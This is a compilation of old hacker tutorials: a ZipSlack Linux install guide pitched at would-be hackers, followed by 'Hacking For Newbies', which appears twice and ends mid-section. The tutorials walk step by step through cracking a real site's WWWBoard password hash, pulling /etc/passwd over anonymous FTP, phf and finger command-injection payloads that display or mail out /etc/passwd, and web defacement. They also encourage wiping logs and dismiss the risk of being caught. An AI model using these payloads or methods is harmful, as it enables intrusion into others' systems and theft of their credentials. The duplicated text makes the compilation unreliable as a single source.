\linux\loadlin \linux\vmlinuz root=/dev/hda1 (hda1 means the IDE1 Master HDD)
I have Linux on my drive D: (the IDE2 Master HDD), and for me the line would be:
\linux\loadlin \linux\vmlinuz root=/dev/hdc1
7/ If you are unsure, the Linux.bat file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right shift key and PageUp) when the kernel halts to go back and look at your partitions, noting the names Linux gives them. With this information, you should be able to edit the LINUX.BAT correctly.
8/ Well, I skipped ahead of myself. You are now (already) ready to boot up your Linux system. Who said it was hard?
9/ Ok, you must go 'Shut Down' and 'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run Linux.bat
10/ The Linux system will load itself over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so only linux loads).
11/ You will see a whole lot of stuff loading. Then you will see a login: prompt.
12/ You have an operating system just like all the big net servers have!
13/ Okay, just type in 'root', and you have root access on the system. You will want to give yourself a password, so type 'passwd'. Choose something you will remember. Without it, you cannot log in.
14/ Now you will have a black screen with a # looking at you. Dont let that worry you - its just like a MS-DOS screen. A few commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like dos), 'pico' (an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes with zipslack).
15/ Now, type 'setup'.
16/ Setup your mouse, network settings, screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.
17/ Now, if you want net access, through this - type 'pppsetup'. This starts the ppp (point to point protocol) setup. You will need to know all your internet settings, like your Gateway, Nameserver numbers, etc. If you dont know these, go back to windows and see what values you used from the Control Panel : Internet section.
18/ Okay. Reboot. Your mouse should be working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If you have a standard external modem on Com 2, it is probably okay. Otherwise, it's sometimes a pain to configure your modem for Linux.
19/ If you are having modem troubles, type 'mc to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then 'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual config section. Uncomment /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2 or cua3 (Com 3: or 4:) for internal modem users. Now, from windows, go to Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for your modem. If you are in Win95, I think you have to run something called msd.com in the \windows directory. Put these setting in. Then, edit S.rc and at the bottom, uncomment the place where it says to call the serials.rc file.
20/ If you have a CD-Rom you can also edit S.rc so that it checks for a CD Rom during bootup.
21/ All things going well, you should now have a fully functional Unix type system on your computer. You can download all your latest little X-Crush programs (in .tgz format). To setup Software - say a Linux stealth port scanner, save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'. Real easy. If it is a C program, type 'gcc program.c' to compile it.
22/ Well, you are missing a Windows type interface. You dont need one. But if you want to surf using Linux, etc. It is better to have a graphical interface - although you can run a browser called 'lynx' just through the vanilla Linux interface.
23/ You can get some things, like X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/
24/ Just get all the files that look vital (about 8 of them), and run pkgtool to install them all. You will probably find that setting up X-Win for the first time is a huge pain. It was for me at least - you need to know, for example, the horizontal and vertical refresh rates of your monitor. Then, get something like the Linux Netscape, or Arena as a browser. These run thru X-Windows.
25/ You will have fun tweaking everything as you like it. There are dozens of windows interfaces to choose from. Some looks almost identical to Win95.
26/ Where from here? You can now do practically anything - you basically have all the net power your ISP does, except for all the phone lines. You can let people use you as a dial up ISP, you can host web pages and set up FTP sites to run from your computer. You can set up email addresses, nameservers... anything.
27/ Because Linux is the same software as most ISPs run, a lot of hackers use Linux. You will be able to issue commands to other servers. You can ask other servers about themselves. For example, type 'showmount -e victim.com'. You can also run things like 'ping', and 'traceroute' directly from your command line. You can send mail from your own sendmail program so that it is untraceable.
Some last incentives, if you were brought up in the Windows world and are afraid of command prompts, just type 'mc'. The zipslack distro comes with this 'Midnight Commander' - which I use a lot. And play a few games on the things. There are a few old favourites installed by default - like 'trek', and 'adventure', etc. If you were in computers 20 years ago, you will know what I mean. The games directory is in usr/games.
If you have got any more problems, there are a lot of people on the IRC #Linux channel on undernet who are very helpful. If your Linux is set up to the net, you can run the Linux Bitch-X IRC program to get there. Zipslack also has pine (for email), tin (for newsgroups), and lynx (for surfing).
Fact is, when you got this all working for a few weeks (and probably loving it), you will no doubt like to try some more advanced Linux distros. Although there are a lot of personal feelings about various distributions, I recommend RedHat 5.2 Linux. You will find it very easy to install.
If you are happy buying through Amazon.Com, here is
[Nah, it didn't work]
[Yes! I Got Me Some Encrypted Passwords!]
CURRENT LIMIT:
You have reached the current limit of the tutorials.... I will add further steps when I get the time and if people like these lessons. Also, if people want to write sections up for this, just mail the sections to me, to the e-mail address listed at Cyberarmy.Com.
Until this gets bigger, I can suggest a few books that teach hacking. I've found that a lot of books are rubbish and just teach how to change screen colours, but there are a few that every hacker should have in their library.
THE ESSENTIAL HACKER'S LIBRARY:
ESSENTIAL BOOKS:
1. MAXIMUM SECURITY
2. THE HAPPY HACKER
ESSENTIAL SOFTWARE:
1. LINUX
NOT ESSENTIAL, BUT RECOMMENDED BOOKS:
(These books are mainly just part of the Hacker Culture)
3. THE WATCHMAN
4. THE FUGITIVE GAME
5. TAKEDOWN
Okay, as for programming books - stuff it. You can download the things for free if you search for "perl + programming + tutorial" and things like that. Unless you like printed books, forget that. So, the only other thing is Linux. You will need to have Linux as a dual boot option on your PC if you want to do any serious hacking.
Some books that suck: these are some books that are going around that are a rip-off. SECRETS OF A SUPER HACKER
So, keep going through this tutorial as it gets bigger, read anything you find on the web. Get some of the major books above, at least 1 and 2, and read them very carefully - four or five times. Join your local Linux users group, if you have one. And, later on, download a few guides on programming and read through them when you get some time. With some effort (it isn't easy), you can become a respected hacker and take control of the Net.
[Back to Index]
CONGRATULATIONS:
You have gained access.
If you now have the login code and password, you may use the users mail account, FTP priviliges (change their web pages by uploading new ones), and HTTP access.
(If you have only got access to a user level account, do not despair. If you have a user level account, it is easy to use that to later get a root level account. More on this when this study is made bigger).
Hacking For Newbies
Made on August 19, 1997.
Introduction - OK, this file is intended solely for people who know very little about hacking, and when I say very little I mean very little. Now, for those of you jumping happily around and screaming "Finally, I am gonna be a hacker!” stop jumping around and just sit down, take a few deep breaths, and just relax.
After reading this file you should be able to hack
1 - A WWWBOARD,
2 - FTP/UNIX sites,
3 - Website Tricks, and
4 - Neat stuff/Misc. with much confidence.
Now, on to the disclaimer:
*** I will NOT be held responsible for what you do with this information. ***
NOTE: All commands that are written in this file, with the exception of the John the Ripper commands, like "edit passwd" are for DOS, so if you have UNIX use the VI editor or something of the sort.
OK, now there is no specific table of contents of this file, I am pretty much just going to make it up as I go along. Now, for you advanced hackers out there, I would recommend just leaving this file because you probably won't find much in this file that you don't already know. All right, now that I'm done this stupid raving rant, I can start explaining how to go about learning what you want to learn.
1 - How to hack a WWWBOARD (Credit going to kM of www.hackersclub.com for coming up with this brilliant idea, lets all applaud kM.)
OK, now obviously, in order to hack a WWWBOARD you need some sort of password file. Now, defaultly the passwd file is in the WWWBOARD directory. Most people who run the WWBOARD think to themselves "Hmm... What are the odds of some guy coming along and wanting to hack my WWWBOARD?" Well, the odds are pretty damn good. Now, when I say hack I mean both just to explore and just to do fun stuff like deleting files. I am not saying deleting files is GOOD, but sometimes it is fun. Anyway, the passwd file is almost always in the WWWBOARD directory, so lets take a real WWWBOARD.
The URL is http://www.cobleskill.edu/projects/archeo/wwwboard/. Now, if you go to that URL you will see a listing of files. For the purpose of this file ONLY, and not malicious intent, I have not alerted the site of this problem. Now, go to that URL and click on the file passwd.txt. You will get two words that look like this:
WebAdmin:aepTOqxOi4i8U
The first word, WebAdmin, is the username of, obviously, the operator of this WWWBOARD. The second "word" is the password, now, your probably sitting there looking at that word thinking to yourself "God damn, that is one funky password!" Well, stop thinking that because yes, that is the password, but it is encrypted. So, you have to get a password cracker. Now, I recommend one of two Password Crackers, either CrackerJack or John the Ripper, both of these can be found at http://www.hackersclub.com or almost any other hacking site. Once you go and get a password cracker you will most likely need a Word File. Those to can be found at http://www.hackersclub.com. Once you get the necessary stuff, you will need to copy the password file, WebAdmin:aepTOqxOi4i8U, and paste it into an empty notepad file or something of the sort. Now, you are probably thinking to yourself again "Alright, now I can crack this bad-ass of a password and become a hacker!" Sorry to rain on your parade, but no. Yes, you might be able to crack the password, but then ask yourself one question, once I got the password, what do I do with it?? Do I go mail it to the server www.cobleskill.edu and say "Hey, I got your passwd, now give me complete access to your WWWBOARD!" Sorry, if you do that, you will be thinking for about 10 years in prison "What did I do wrong?" or you might become Bruno's sweet boy. Sound like fun?? Didn't think so. OK, now IF you crack the password file, and you get the Username and Password, unencrypted of course, paste it into a text document or something, then add this right onto it - ":-2:-2:anonymous NFS user:/:/bin/date" What that will do will turn the WWWBOARD passwd file into a UNIX passwd file. If you don't do that then you will never crack the file. All in all the passwd file should look like this: "WebAdmin:aepTOqxOi4i8U:-2:-2:anonymous NFS user:/:/bin/date" Now, I don't use CrackerJack, so if you got that I can't help you, but if you got John the Ripper then type in this command in DOS : "john -pwfile:xxxxx -wordfile:xxxxx" XXXXX is whatever you named the passwd file or the word file. For example, "john -pwfile:hehe.txt -wordfile:WF.txt" It should just screw around for awhile and compute stuff and then if it is cracked you will get on the left side of the screen the passwd, WebBoard, and the Username, WebAdmin. Now, WebAdmin and WebBoard are the two-default username and passwds. Shows you about security these days. Now, once you got those two things, go into the WWWBOARD directory and look for a file(s) called WWWADMIN.CGI or WWWADMIN.PL or WWWBOARD.CGI or even WWWBOARD.PL. If none of those are there then you should examine the rest of the files in the directory. When I was in the directory the file wasn't there, but I found it nevertheless, I am not going to tell you what it is, but once you find it you will get something like this:
WWWAdmin For WWWBoard
Choose your Method of modifying WWWBoard Below:
Remove Files
Remove Files
Remove Files by Message Number
Remove Files by Date
Remove Files by Author
Password
Change Admin Password
That is, you guessed it, the little "Operating Station" for the WWWBOARD. Now, to do any of those things you must have the Username and Passwd that you cracked. So, click on an option and I think the rest is pretty much self-explanatory. I really do not recommend trashing the WWWBOARD, some people depend on them to get a lot of questions and answers, etc. I usually just read all the hidden messages and stuff like that and then just leave or tell the Operator of the WWWBOARD that his board is 100% trashable.
2 - Hacking an FTP site
OK, now hacking an FTP site WAS pretty easy a while ago, but nowadays most passwd files are shadowed which adds a little bit of extra security. I'll explain it later. OK, now, just before we start, the passwd file on UNIX machines is "passwd" not "passwd.txt." OK, now, for the example site we are going to use http://www.freestuff.com. Now, with the information I am going to give you will not let you hack this site because the passwd file is shadowed, as is almost every single website, but nevertheless, if you "experience" hacking long enough, you will find the answer on how to get the file. OK, now the first step is to do 1 of 2 things, get an FTP browser, like CuteFTP or BulletFTP or something, or you can use Win95 FTP which no one really knows about and how I found out is beyond my memory. OK, I will explain the FTP browser way first. OK, fire up the FTP Browser and for the host name plug in www.freestuff.com and for the port leave it at whatever it is, and hit connect, if there are any other options, then just screw around with them for a while and you'll figure it out. Anyway, for the access type or whatever, click on Anonymous, and after you hit connect you'll get some directories in the Remote Host box, and some other neat stuff in Local Host. Now, in the Remote Host section you want to double click on the "etc" directory if it is visible, if it is not, then see in the pull-down menus if there is an option called custom command. If there is then click on it and for the command type in "cd etc" and it will either say "OK, CWD command accepted" or something along the lines of that or it will say "..:Access Denied" or even "Error:There is no file or directory by that name." If you get the CWD command accepted then were in business. In the /etc/ directory you should see a file called passwd. If you don’t then go back up to custom command an for the command type in "get /etc/passwd" and it will either say "OK, Port command successful" or it will say "..:Access Denied." If you see that file then you can just drag the file over to local host and then click on the button "Start Download" or "Start Query" or something like that.
Now, if you have Win95 FTP you will have to go the Start Menu MS-DOS Prompt and type in "FTP WWW.FREESTUFF.COM" and it will show up a bunch of neat little messages like "connecting to www.freestuff.com" and other stuff. Eventually you will get to the login screen where it will say "(USER)" or something interesting and long like that. Now, for User type in Anonymous. If it accepts it will say "Password" or it will say, "Anonymous access not allowed on this server." Now, obviously the FBI or CIA is not going to allow ftp access, so don't even try it. Now, if you get to the password part, just type in something interesting like "Suckhole@" and the ftp server will fill in the rest. You can make it anything you want, now you'll either get 1 of 2 messages, within a marginal error, "Cannot set guest privileges" or this "Anonymous access allowed, guest privileges set." Those should be the only two that you get. If there are any others, these messages are pretty much self explanatory. Now, when you log on, the first thing you want to type is this command "pwd." Just that, it will display the current directory that you are in. You want it to say "/." If it doesn't then type this command about 3 times "cd .." That will take you down 1 directory/subdirectory. Once you get to the "/" directory, type this command "ls -a." It will list all the files in the directory, including the hidden ones. Now, if you see something in the listing that says "etc" then type this command "cd etc." That will move you into the "etc" directory. Just to be sure, type in "pwd" again to make sure you’re in the "etc" directory. If you are, then good, and type "ls -a" again and you should get some of these files: "Pwd.db, passwd, group, netconfig, net.config, or maybe even master.passwd." The two files we are most interested in are "passwd" and "master.passwd." I think what the files hold are kind of self-explanatory, but I'll tell you anyway, the "passwd" file holds all the usernames and passwd's that are on the entire system that your rooting around on. The "master.passwd" file will only show up if the passwd file is shadowed, and it also means the SysAdmin is a complete brain puppy. Forget "master.passwd" for now. The command you want to issue to this system is to get the "passwd" file from their computer to your computer, and we do that by simply typing, "get passwd." It should barf up some neat stuff, and then start transferring the file. When you get back to the ftp prompt you will have the passwd file on your C:\ drive or wherever you initiated the "ftp www.freestuff.com" from. Now, you just want to type in "quit." That will log you off the server. Now, for some reason right when you logoff the server you want to log back on just hit the "F3" key and it will pop up your last command. Now, what you want to do is move the passwd file to wherever your passwd cracker is. You can do that by typing, "move passwd X:\XX." X is the drive that your passwd cracker is on and XX is the directory the passwd cracker is in. Then it should say something like this: passwd -------> X:\XX -->OK" or something like that. Once you have moved the passwd file go the passwd crackers directory and open up the file by typing "Edit passwd." If the file has a bunch of stuff that looks like this:
root:x:x:x:x:x:x:
daemon:x:x:x:x:x:x
If it looks like that, not all the x's, just one by the usernames, then the passwd file is shadowed and can’t be cracked, might as well delete it (More info on shadowed passwd's at the bottom of this file). If it isn't shadow then just type in the passwd cracking command and get ready to hack a server! I still highly recommend not doing any damage, there are many ways to get caught and just to help out the websites out there I will not tell you the ways that they can catch you, But don't worry, every 8 out of 10 servers that are aware of having an attempted hack don't report it and just go about there business. Now, one more thing, if you get on the server with root access (basically root means that you can do anything, you are God on this system) then there are log files that record what happens to you, now, I think I am handing you more than enough information, so I am going to let you found out how to wipe your presence from the system, there are plenty of .txt files out there that tell you how to do it.
3 - Website Tricks
OK, now these Website tricks are "tricks" to get the passwd file without using FTP Browser or FTP Browsers.
The PHF Trick
OK, now this phf trick is a bit tricky (hehehe), not to use, but in the fact that some sites have added a command in there HTML code that if the phf command is issued then it will display a message like "Smile your on candid camera!" or it will say this "Your hack attempt has been logged and sent to the proper authorities." Sit the hell down, drop that shotgun, unbar your door, and stop whimpering about how your going to get busted and raped in prison by Scruffy. 90% of the time they are just bullshitting you and to them the proper authorities could be out in deep-dish-yak-dick country or in Bum Fuck Egypt. They just do that to scare the living shit out of Newbies or anybody who does that. It is bullshit, so stop worrying. OK, now on how to do the phf trick. This trick practically never works anymore, but hey, its fun to try on old school sites and stuff like that. I don't have an example site cause I really don't want to hunt down a site that this trick works on, so go find on yourself and don't send me e-mail about how you can't find a site that this doesn't work on. In order to do this trick the site must have a /cgi-bin/ directory. If it doesn't, then just leave it and forget the whole damn thing on that site, but if it does then keep reading. I am going to make this quick, an example would be this: http://www.Imanasshole.org/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
That will bring up the passwd file, but 95% of the time you'll get this very common and even more very crappy error about how the file doesn't exist. OK, that's the phf trick. Now, onto the finger-box hacking trick.
Finger-Box Hacking
Again for the finger-box hack to work you have to find a website with the /cgi-bin/ directory. I am just going to post the basic outline of commands for this cause my fingers are getting very tired of typing this :-). An example of finger-box hack is this:
http://www.XXXXX.com/cgi-bin/finger
After you type that in you will get a box, if you don't then the finger isn't there or you don't have access to it, and in the box type this:
nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd
Substitute where necessary, I have never actually gotten this trick to work cause I've never tried it more than once or twice cause I never needed it, but I knew about it so go crazy :-).
Rewriting A Web page Right From Your Web Browser
In order to do this trick again you need the /cgi-bin/ directory on your "target" site. For example, type this when you have a website that has the /cgi-bin/ directory:
http://www.XXXXX.com/cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some stuff"%2
"Some stuff" is whatever you want to add basically, but beware, sometimes the web site can track you using the cookies that you sent while on there page, so just to be sure that they don't have cookie requests, if you have Netscape, then in the configuration somewhere, I forget where, check the box that says "Enable alert when accepting a cookie" or something that looks along the lines of that.
4 - Neat stuff/Misc.
The first thing I am going to cover is just some very interesting tricks that I know about AltaVista, http://www.Altavista.com. These tricks only involve you typing in something for the search query. OK, here are a list of words and things that will bring up very interesting files from websites:
root:
root
passwd.txt
wwwadmin.cgi
wwwboard.cgi
wwwadmin.pl
wwwboard.pl
passwd (Note: supposed to bring up UNIX passwd files but I haven’t tried it, so if you try it send me some e-mail and let me know what happens).
wwwboard (Note: brings up the wwwboard directories so you can look for the passwd.txt file and other neat stuff).
master.passwd (Note: again, never tried it, so send me some feedback, let me know if it is even actually worth some1's time of typing it in, or just a hoax).
OK, those words work in about almost any search engine, but work best with AltaVista because AltaVista searches the links on the pages in it's archive for your word, and almost every page has a link to it's passwd file or something other that is of interest.
OK, now this next trick I thought of when I d/led HakTek to check it out it had a feature of deleting mail-bombed messages, now, if you don't have HakTek, and don't want it/can't find it, then just go into the mail directory of your web browser, and delete all the mail and the mail bomber has wasted his time.
Now I am just going to give you some UNIX commands and what they do, so if you want to be a UNIX fan or LINUX fan then check these out:
cd X - X = the directory that you want to switch to
ls - list all the files in a directory, excluding the hidden ones
ls -a - lists all the files in a directory, including the hidden ones
ls -A - lists all the hidden files in a directory, but not the . and ..
ls -ALF - lists the properties of all the files in a directory
cd .. - goes down one directory/subdirectory
cd . - absolutely nothing!
quit - log off the ftp site (obviously only on Win95 FTP)
Those commands listed above work on BOTH FTP sites AND UNIX machines, now here are commands that work ONLY on UNIX machines:
cat X - the file you want to view
vi - Visual Editor that you can use to edit files
edit - edit files (not sure on this one, works on some UNIX's)
ed - edit files (on all machines)
chmod - change the ownership of a file
help - list of commands that you can use (Note: * next to command means that it is not used on that certain UNIX machine)
man X - for further information on a CERTAIN UNIX command whereas X is the command that you want more information on
Well, that about does it for this file, but I really didn't want to wrap it up so I am going to add some links that will help you A LOT in your travels, so visit all these links for all the tools and other things that you'll need:
http://www.hackersclub.com - A great site, I give it two-thumbs up :-).
http://project-one.com - Under Construction, where this file was intended).
http://hackers.com - Under MAJOR Construction, going to be one of the best hacking sites ever, home of Revelation, I don't know him, but if he is reading this file, then Hi revelation! :-).
http://www.adirtroad.com - TONS of neat things, and TONS of free-stuff links, again, two-thumbs up :-).
http://easyweb.easynet.co.uk/~davegraham/britpack.htm - Brit Hack Pack, there was a rumor going around that there files had virii, that is a bunch of BS, I support them completely, even though I'm not British :-).
http://www.wtp.net/~xeno/main.htm - An all around good site
http://www.geocities.com/SiliconValley/3078/frame2.html - Well, I really only included this link cause the leader of this group and the guy who runs the page loves to cause mass destruction, and he's funny to watch, so keep being funny Senate :-).
http://www.WorkingDesigns.com - Absolutely nothing to do with hacking just a great place to go if you have any of there RPG games, hope they finish the site sometime soon... and my final link:
http://www.freestuff.com - You remember that site right?? I thought so; guess what you find there???
Well, I hope you enjoyed this file and learned a lot from it, I certainly put a lot of typing into it, so if you really want to send me some money.... I mean a donation, hehe, don't, keep your money, cause I'm sure you have better things to spend it on then giving it to me :-), *mentally smacking myself for refusing money*. OK, well, I will probably write a lot more files cause I enjoy writing Newbie stuff, so well, if you want to E-mail me the send mail to: RAWTAZ@CONNIX.COM
And I will get back to you whenever I can. Hang in there, you'll get there someday :-).
My "Quote" Of The Day (hehe):
Frustrated Person: "WHY WON'T THIS DAMN THING WORK?!?!?!?"
Calm, Clean Shaven Teacher: "Examine it, what do you find wrong with it?"
Frustrated Person: "NOTHING, IT IS BROKEN!!!"
Calm, Clean Shaven Teacher: "You are to quick to anger, learn patience."
Frustrated Person: "WHY PATIENCE, ITS BROKEN!!!!!!!"
Calm, Clean Shaven Teacher: "It's not plugged in."
Frustrated Person: "Oh, I knew that."
Moral of story: Patience is the ultimate weapon
-Phooey
Introduction - OK, this file is intended solely for people who know very little about hacking, and when I say very little I mean very little. Now, for those of you jumping happily around and screaming "Finally, I am gonna be a hacker!” stop jumping around and just sit down, take a few deep breaths, and just relax.
After reading this file you should be able to hack
1 - A WWWBOARD,
2 - FTP/UNIX sites,
3 - Website Tricks, and
4 - Neat stuff/Misc. with much confidence.
Now, on to the disclaimer:
*** I will NOT be held responsible for what you do with this information. ***
NOTE: All commands that are written in this file, with the exception of the John the Ripper commands, like "edit passwd" are for DOS, so if you have UNIX use the VI editor or something of the sort.
OK, now there is no specific table of contents of this file, I am pretty much just going to make it up as I go along. Now, for you advanced hackers out there, I would recommend just leaving this file because you probably won't find much in this file that you don't already know. All right, now that I'm done this stupid raving rant, I can start explaining how to go about learning what you want to learn.
1 - How to hack a WWWBOARD (Credit going to kM of www.hackersclub.com for coming up with this brilliant idea, lets all applaud kM.)
OK, now obviously, in order to hack a WWWBOARD you need some sort of password file. Now, defaultly the passwd file is in the WWWBOARD directory. Most people who run the WWBOARD think to themselves "Hmm... What are the odds of some guy coming along and wanting to hack my WWWBOARD?" Well, the odds are pretty damn good. Now, when I say hack I mean both just to explore and just to do fun stuff like deleting files. I am not saying deleting files is GOOD, but sometimes it is fun. Anyway, the passwd file is almost always in the WWWBOARD directory, so lets take a real WWWBOARD.
The URL is http://www.cobleskill.edu/projects/archeo/wwwboard/. Now, if you go to that URL you will see a listing of files. For the purpose of this file ONLY, and not malicious intent, I have not alerted the site of this problem. Now, go to that URL and click on the file passwd.txt. You will get two words that look like this:
WebAdmin:aepTOqxOi4i8U
The first word, WebAdmin, is the username of, obviously, the operator of this WWWBOARD. The second "word" is the password, now, your probably sitting there looking at that word thinking to yourself "God damn, that is one funky password!" Well, stop thinking that because yes, that is the password, but it is encrypted. So, you have to get a password cracker. Now, I recommend one of two Password Crackers, either CrackerJack or John the Ripper, both of these can be found at http://www.hackersclub.com or almost any other hacking site. Once you go and get a password cracker you will most likely need a Word File. Those to can be found at http://www.hackersclub.com. Once you get the necessary stuff, you will need to copy the password file, WebAdmin:aepTOqxOi4i8U, and paste it into an empty notepad file or something of the sort. Now, you are probably thinking to yourself again "Alright, now I can crack this bad-ass of a password and become a hacker!" Sorry to rain on your parade, but no. Yes, you might be able to crack the password, but then ask yourself one question, once I got the password, what do I do with it?? Do I go mail it to the server www.cobleskill.edu and say "Hey, I got your passwd, now give me complete access to your WWWBOARD!" Sorry, if you do that, you will be thinking for about 10 years in prison "What did I do wrong?" or you might become Bruno's sweet boy. Sound like fun?? Didn't think so. OK, now IF you crack the password file, and you get the Username and Password, unencrypted of course, paste it into a text document or something, then add this right onto it - ":-2:-2:anonymous NFS user:/:/bin/date" What that will do will turn the WWWBOARD passwd file into a UNIX passwd file. If you don't do that then you will never crack the file. All in all the passwd file should look like this: "WebAdmin:aepTOqxOi4i8U:-2:-2:anonymous NFS user:/:/bin/date" Now, I don't use CrackerJack, so if you got that I can't help you, but if you got John the Ripper then type in this command in DOS : "john -pwfile:xxxxx -wordfile:xxxxx" XXXXX is whatever you named the passwd file or the word file. For example, "john -pwfile:hehe.txt -wordfile:WF.txt" It should just screw around for awhile and compute stuff and then if it is cracked you will get on the left side of the screen the passwd, WebBoard, and the Username, WebAdmin. Now, WebAdmin and WebBoard are the two-default username and passwds. Shows you about security these days. Now, once you got those two things, go into the WWWBOARD directory and look for a file(s) called WWWADMIN.CGI or WWWADMIN.PL or WWWBOARD.CGI or even WWWBOARD.PL. If none of those are there then you should examine the rest of the files in the directory. When I was in the directory the file wasn't there, but I found it nevertheless, I am not going to tell you what it is, but once you find it you will get something like this:
WWWAdmin For WWWBoard
Choose your Method of modifying WWWBoard Below:
Remove Files
Remove Files
Remove Files by Message Number
Remove Files by Date
Remove Files by Author
Password
Change Admin Password
That is, you guessed it, the little "Operating Station" for the WWWBOARD. Now, to do any of those things you must have the Username and Passwd that you cracked. So, click on an option and I think the rest is pretty much self-explanatory. I really do not recommend trashing the WWWBOARD, some people depend on them to get a lot of questions and answers, etc. I usually just read all the hidden messages and stuff like that and then just leave or tell the Operator of the WWWBOARD that his board is 100% trashable.
2 - Hacking an FTP site
OK, now hacking an FTP site WAS pretty easy a while ago, but nowadays most passwd files are shadowed which adds a little bit of extra security. I'll explain it later. OK, now, just before we start, the passwd file on UNIX machines is "passwd" not "passwd.txt." OK, now, for the example site we are going to use http://www.freestuff.com. Now, with the information I am going to give you will not let you hack this site because the passwd file is shadowed, as is almost every single website, but nevertheless, if you "experience" hacking long enough, you will find the answer on how to get the file. OK, now the first step is to do 1 of 2 things, get an FTP browser, like CuteFTP or BulletFTP or something, or you can use Win95 FTP which no one really knows about and how I found out is beyond my memory. OK, I will explain the FTP browser way first. OK, fire up the FTP Browser and for the host name plug in www.freestuff.com and for the port leave it at whatever it is, and hit connect, if there are any other options, then just screw around with them for a while and you'll figure it out. Anyway, for the access type or whatever, click on Anonymous, and after you hit connect you'll get some directories in the Remote Host box, and some other neat stuff in Local Host. Now, in the Remote Host section you want to double click on the "etc" directory if it is visible, if it is not, then see in the pull-down menus if there is an option called custom command. If there is then click on it and for the command type in "cd etc" and it will either say "OK, CWD command accepted" or something along the lines of that or it will say "..:Access Denied" or even "Error:There is no file or directory by that name." If you get the CWD command accepted then were in business. In the /etc/ directory you should see a file called passwd. If you don’t then go back up to custom command an for the command type in "get /etc/passwd" and it will either say "OK, Port command successful" or it will say "..:Access Denied." If you see that file then you can just drag the file over to local host and then click on the button "Start Download" or "Start Query" or something like that.
Now, if you have Win95 FTP you will have to go the Start Menu MS-DOS Prompt and type in "FTP WWW.FREESTUFF.COM" and it will show up a bunch of neat little messages like "connecting to www.freestuff.com" and other stuff. Eventually you will get to the login screen where it will say "(USER)" or something interesting and long like that. Now, for User type in Anonymous. If it accepts it will say "Password" or it will say, "Anonymous access not allowed on this server." Now, obviously the FBI or CIA is not going to allow ftp access, so don't even try it. Now, if you get to the password part, just type in something interesting like "Suckhole@" and the ftp server will fill in the rest. You can make it anything you want, now you'll either get 1 of 2 messages, within a marginal error, "Cannot set guest privileges" or this "Anonymous access allowed, guest privileges set." Those should be the only two that you get. If there are any others, these messages are pretty much self explanatory. Now, when you log on, the first thing you want to type is this command "pwd." Just that, it will display the current directory that you are in. You want it to say "/." If it doesn't then type this command about 3 times "cd .." That will take you down 1 directory/subdirectory. Once you get to the "/" directory, type this command "ls -a." It will list all the files in the directory, including the hidden ones. Now, if you see something in the listing that says "etc" then type this command "cd etc." That will move you into the "etc" directory. Just to be sure, type in "pwd" again to make sure you’re in the "etc" directory. If you are, then good, and type "ls -a" again and you should get some of these files: "Pwd.db, passwd, group, netconfig, net.config, or maybe even master.passwd." The two files we are most interested in are "passwd" and "master.passwd." I think what the files hold are kind of self-explanatory, but I'll tell you anyway, the "passwd" file holds all the usernames and passwd's that are on the entire system that your rooting around on. The "master.passwd" file will only show up if the passwd file is shadowed, and it also means the SysAdmin is a complete brain puppy. Forget "master.passwd" for now. The command you want to issue to this system is to get the "passwd" file from their computer to your computer, and we do that by simply typing, "get passwd." It should barf up some neat stuff, and then start transferring the file. When you get back to the ftp prompt you will have the passwd file on your C:\ drive or wherever you initiated the "ftp www.freestuff.com" from. Now, you just want to type in "quit." That will log you off the server. Now, for some reason right when you logoff the server you want to log back on just hit the "F3" key and it will pop up your last command. Now, what you want to do is move the passwd file to wherever your passwd cracker is. You can do that by typing, "move passwd X:\XX." X is the drive that your passwd cracker is on and XX is the directory the passwd cracker is in. Then it should say something like this: passwd -------> X:\XX -->OK" or something like that. Once you have moved the passwd file go the passwd crackers directory and open up the file by typing "Edit passwd." If the file has a bunch of stuff that looks like this:
root:x:x:x:x:x:x:
daemon:x:x:x:x:x:x
If it looks like that, not all the x's, just one by the usernames, then the passwd file is shadowed and can’t be cracked, might as well delete it (More info on shadowed passwd's at the bottom of this file). If it isn't shadow then just type in the passwd cracking command and get ready to hack a server! I still highly recommend not doing any damage, there are many ways to get caught and just to help out the websites out there I will not tell you the ways that they can catch you, But don't worry, every 8 out of 10 servers that are aware of having an attempted hack don't report it and just go about there business. Now, one more thing, if you get on the server with root access (basically root means that you can do anything, you are God on this system) then there are log files that record what happens to you, now, I think I am handing you more than enough information, so I am going to let you found out how to wipe your presence from the system, there are plenty of .txt files out there that tell you how to do it.
3 - Website Tricks
OK, now these Website tricks are "tricks" to get the passwd file without using FTP Browser or FTP Browsers.
The PHF Trick
OK, now this phf trick is a bit tricky (hehehe), not to use, but in the fact that some sites have added a command in there HTML code that if the phf command is issued then it will display a message like "Smile your on candid camera!" or it will say this "Your hack attempt has been logged and sent to the proper authorities." Sit the hell down, drop that shotgun, unbar your door, and stop whimpering about how your going to get busted and raped in prison by Scruffy. 90% of the time they are just bullshitting you and to them the proper authorities could be out in deep-dish-yak-dick country or in Bum Fuck Egypt. They just do that to scare the living shit out of Newbies or anybody who does that. It is bullshit, so stop worrying. OK, now on how to do the phf trick. This trick practically never works anymore, but hey, its fun to try on old school sites and stuff like that. I don't have an example site cause I really don't want to hunt down a site that this trick works on, so go find on yourself and don't send me e-mail about how you can't find a site that this doesn't work on. In order to do this trick the site must have a /cgi-bin/ directory. If it doesn't, then just leave it and forget the whole damn thing on that site, but if it does then keep reading. I am going to make this quick, an example would be this: http://www.Imanasshole.org/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
That will bring up the passwd file, but 95% of the time you'll get this very common and even more very crappy error about how the file doesn't exist. OK, that's the phf trick. Now, onto the finger-box hacking trick.
Finger-Box Hacking
